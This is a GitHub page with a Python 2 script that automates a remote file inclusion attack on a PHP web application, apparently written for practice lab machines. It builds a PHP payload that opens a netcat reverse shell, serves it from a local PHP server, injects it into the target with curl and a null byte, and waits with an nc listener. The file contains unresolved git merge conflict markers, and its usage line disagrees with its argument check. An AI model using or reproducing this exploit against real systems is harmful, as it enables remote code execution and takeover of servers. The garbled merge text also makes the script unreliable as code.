Exploit-Dev-CVE-Code/Automate_rfi_RCE.py at master · OlivierLaflamme/Exploit-Dev-CVE-Code · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/usr/bin/env python2
<<<<<<< HEAD
#  -*- coding: utf-8 -*- #######################################################################################################
# DESCRIPTION                                                                                                                  #
# Automates remote file inclusion attack                                                                                       #                                                                                              #
#                                                                                                                              #
################################################################################################################################
=======
# Automates remote file inclusion attack                                                                                       #
>>>>>>> c73dad70671e081f7bcdd1a0384cb55c8fecd1bb

import signal
import os
import sys
import time

<<<<<<< HEAD

=======
>>>>>>> c73dad70671e081f7bcdd1a0384cb55c8fecd1bb
from multiprocessing import Process

# Handler to exist cleanly on ctrl+C
def signal_handler(signal, frame):
    print "\nYou pressed Ctrl+C!"
    sys.exit()
signal.signal(signal.SIGINT, signal_handler)

<<<<<<< HEAD
=======
# Let user override default port.
if os.getenv('HTTP_PORT') != None:
    HTTP_PORT = os.getenv('HTTP_PORT')
else:
    HTTP_PORT = '8000'
>>>>>>> c73dad70671e081f7bcdd1a0384cb55c8fecd1bb

def build_payload():

    payload = '''<?php echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f");?>''' % (LHOST, LPORT)

    with open('/tmp/evil.txt', 'w') as f:
        f.write(payload)


def HttpListener():

    os.chdir('/tmp')
<<<<<<< HEAD
    os.system('php -S 0.0.0.0:8000')
    print("[+] HTTP Listen = 8000")


def exploit():
    time.sleep(5)
    _payload = 'curl --insecure -s %s=http://%s:8000/evil.txt' % (HOST, LHOST)
=======
    print("[+] HTTP Listen = %s" % HTTP_PORT)
    os.system('php -S 0.0.0.0:%s' % HTTP_PORT)

def exploit():
    time.sleep(5)
    print('[+] Exploit')
    _payload = 'curl --insecure -s %s=http://%s:%s/evil.txt' % (HOST, LHOST, HTTP_PORT)
>>>>>>> c73dad70671e081f7bcdd1a0384cb55c8fecd1bb
    _payload += '%00'
    os.system(_payload)


if __name__ == '__main__':

    if len(sys.argv) != 4:
        print("Usage: %s <HOST> <LHOST> <LPORT> <USERNAME> <PASSWORD>" % (sys.argv[0]))
        print("\nEXAMPLE: ./rfi_rce.py https://10.10.10.59/section.php?page 10.10.14.24 1337\n")
        sys.exit(0)

    HOST = sys.argv[1]
    LHOST = sys.argv[2]
    LPORT = sys.argv[3]

    print("[+] LHOST = %s" % LHOST)

    build_payload()

    # Serve payload
    p = Process(target=HttpListener)
    p.start()

    # Exploit windows
    p = Process(target=exploit)
    p.start()

    print("[+] Netcat = %s" % LPORT)
<<<<<<< HEAD
    os.system('nc -lnvp %s' % LPORT)
=======
    os.system('nc -lnvp %s' % LPORT)
>>>>>>> c73dad70671e081f7bcdd1a0384cb55c8fecd1bb